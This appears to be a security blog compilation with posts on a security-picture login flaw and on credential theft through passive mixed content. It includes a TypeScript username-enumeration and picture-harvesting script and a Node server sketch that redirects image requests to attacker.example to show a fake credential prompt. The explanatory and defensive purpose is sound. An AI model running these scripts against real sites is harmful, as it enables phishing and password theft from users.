In a very similar way, we could make a huge dent in pollution and greenhouse gas emissions if we slowed down our cars and ships by half. For the vast majority of human history, we got by without anyone traveling anywhere close to 40 mph, let alone 80 mph.

When you really have information that people want, the safest thing is probably just to use typewriters. Russia already does, and Germany has considered it.

The solutions to security problems have to be technically correct and psychologically acceptable, and it’s the second part that’s hard.

Security Pictures

Security pictures are used in a multitude of web applications as an extra step in securing the login process. However, are these security pictures being used properly? Could the use of security pictures actually aid hackers? Such questions passed through my mind while testing an application’s login process that relied on security pictures for an extra layer of security.

I was performing a business logic assessment for an insurance application that used security pictures as part of its login process, but something seemed off. The first step was to enter your username; if the username was found in the database, you would be presented with your security picture, e.g. a dog, cat, or iguana. If the username was not in the database, a message was displayed saying that you hadn’t set up your security picture yet. Besides the clear potential for a brute force attack on usernames, there was another vulnerability hiding: you could view other users’ security pictures just by guessing usernames in the first step.
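
A sketch of how that response difference could be scripted to enumerate usernames and harvest pictures (the URL, field name, and marker text are all invented; it assumes a runtime with a global fetch):

```typescript
// Probe one username: return the response body if a security picture was
// shown (i.e., the username exists), or null if the "not set up yet"
// message came back instead.
async function probe(username: string): Promise<string | null> {
  const res = await fetch("https://insurer.example/login/step1", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: `username=${encodeURIComponent(username)}`,
  });
  const page = await res.text();
  return page.includes("have not set up your security picture") ? null : page;
}

// Run candidate usernames through the probe and keep the hits; the attacker
// can then pull each victim's security picture out of the returned page.
async function enumerate(candidates: string[]): Promise<Map<string, string>> {
  const found = new Map<string, string>();
  for (const name of candidates) {
    const page = await probe(name);
    if (page !== null) found.set(name, page);
  }
  return found;
}
```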

Before I started to dwell on how I should classify the possible vulnerability in my assessment, I had to do some quick research on a couple of topics: what are security pictures used for, and how do other applications use them effectively?

I always wondered what extra security the picture added. How could a picture of an iguana I chose protect me from danger at all, or add an extra layer of security when I log in? Security pictures are mainly used to protect users from phishing attacks. For example, if an attacker tries to reproduce a banking login screen, a target user who is accustomed to seeing an iguana picture before entering his or her password would pause for a moment and notice that something is not right, since Iggy isn’t there anymore. The absence of the security picture produces that mental pause, causing the user in most cases not to enter their password.

After finding out the true purpose of security pictures, I had to see how other applications use them in a less broken way. So I visited my bank’s website and entered my username, but instead of having my security picture displayed right away, I was asked to answer my security question. Only once the secret answer was entered would my security picture be displayed above the password input field. This way of using a security picture was secure.

What seemed off in the beginning was that, because attackers can harvest users’ security pictures with a brute force attack, they can go a step further and use the security pictures of target users to create an even stronger phishing attack. This enhanced phishing page would reassure victims that they are on the right website, because their security picture is there as usual.

Now that it was clear the finding was indeed a vulnerability, I had to think about how to classify it and what score to award. I classified it as Abuse of Functionality, since WhiteHat Security defines Abuse of Functionality as:

“Abuse of Functionality is an attack technique that uses a web site’s own features and functionality to attack itself or others. Abuse of Functionality can be described as the abuse of an application’s intended functionality to perform an undesirable outcome. These attacks have varied results such as consuming resources, circumventing access controls, or leaking information. The potential and level of abuse will vary from web site to web site and application to application. Abuse of functionality attacks are often a combination of other attack types and/or utilize other attack vectors.”

In this case an attacker could use the application’s own authentication functionality to attack other users, combining the results of a brute force attack with the harvested security pictures to create a powerful phishing attack. For the scores I chose to use Impact and Likelihood, which are given low, medium, and high values. Impact measures the potential damage a vulnerability inflicts, and Likelihood estimates how likely the vulnerability is to be exploited. In terms of Likelihood, I would rate this a medium, because setting up the phishing attack is very time-consuming: you first have to perform a brute force attack to obtain valid usernames, then pick the specific victims to attack from that list. As for Impact, I would rate this high, because once the phishing attack is sent, the victim would most likely lose his or her credentials.

Security pictures can indeed add an extra layer of security to your application’s login process. However, put on your black hat for a moment and ask how a hacker could use your own security measures against the application. As presented here, sometimes the medicine can be worse than the disease.

Why is Passive Mixed Content so serious?

One of the most important tools in web security is Transport Layer Security (TLS). It not only protects sensitive information during transit, but also verifies that the content has not been modified. The user can be confident that content delivered via HTTPS is exactly what the website sent. The user can exchange sensitive information with the website, secure in the knowledge that it won’t be altered or intercepted. However, this increase in security comes with an increased overhead cost. It is tempting to care only about encryption and forget the integrity guarantees, but every resource called on a secure page should be similarly protected, not just the ones containing secret content.

Most web security professionals agree that active content — JavaScript, Flash, etc. — should only be sourced in via HTTPS. After all, an attacker can use a Man-in-the-Middle attack to replace non-secure content on the fly. This is clearly a security risk. Active content has access to the content of the Document Object Model (DOM), and the means to exfiltrate that data. Any attack that is possible with Cross-Site Scripting is also achievable using active mixed content.

The controversy begins when the discussion turns to passive content — images, videos, etc. It may be difficult to imagine how an attacker could inflict anything worse than mild annoyance by replacing such content. There are two attack scenarios which are commonly cited.

  • An unsophisticated attacker could, perhaps, damage the reputation of a company by including offensive or illegal content. However, the attack would only be effective while the attacker maintains a privileged position on the network. If the user moves to a different Wi-Fi network, the attacker is out of the loop. It would be easy to demonstrate to the press or law enforcement that the company is not responsible, so the impact would be negligible.
  • If a particular browser’s image parsing process is vulnerable, a highly sophisticated attacker can deliver a specially crafted, malformed file using a passive mixed content vulnerability. In this case, the delivery method is incidental, and the vulnerability lies with the client, rather than the server. This attack requires advanced intelligence about the specific target’s browser, and an un-patched or unreported vulnerability in that specific browser, so the threat is negligible.

However, there is an attack scenario that requires little technical sophistication, yet may result in a complete account takeover. First, assume the attacker has established a privileged position in the network by spoofing a public Wi-Fi access point. The attacker can now return any response to non-encrypted requests coming over the air. From this position, the attacker can return a 302 “Found” temporary redirect to a non-encrypted request for the passive content on the target site. The Location header of this redirect points to a resource under the attacker’s control, configured to respond with a 401 “Unauthorized” response containing a WWW-Authenticate header with a value of Basic realm=”Please confirm your credentials.” The user’s browser will halt loading the page and display an authentication prompt. Some percentage of users will inevitably enter their credentials, which will be submitted directly to the attacker. Even worse, this attack can be automated and generalized to such a degree that an attacker could use commodity hardware to set up a fake Wi-Fi hotspot in a public place and harvest passwords from any number of sites.
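
A minimal sketch of the attacker-side responses just described (hostnames and paths are invented; in practice the first response would come from the MITM position itself rather than a separate server):

```typescript
import * as http from "http";

http.createServer((req, res) => {
  if (req.headers.host === "images.target-site.example") {
    // Step 1: answer the page's plain-HTTP image request with a redirect
    // to a host the attacker controls.
    res.writeHead(302, { Location: "http://attacker.example/prompt" });
  } else {
    // Step 2: the attacker's host replies with a Basic auth challenge, so
    // the victim's browser pops up a native-looking credential prompt.
    res.writeHead(401, {
      "WWW-Authenticate": 'Basic realm="Please confirm your credentials"',
    });
  }
  res.end();
}).listen(80);
```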

Protecting against this attack is relatively simple. For users: be very suspicious of any unexpected login prompt, especially if it doesn’t look like part of the website. For developers: source in all resources using HTTPS on every secure page.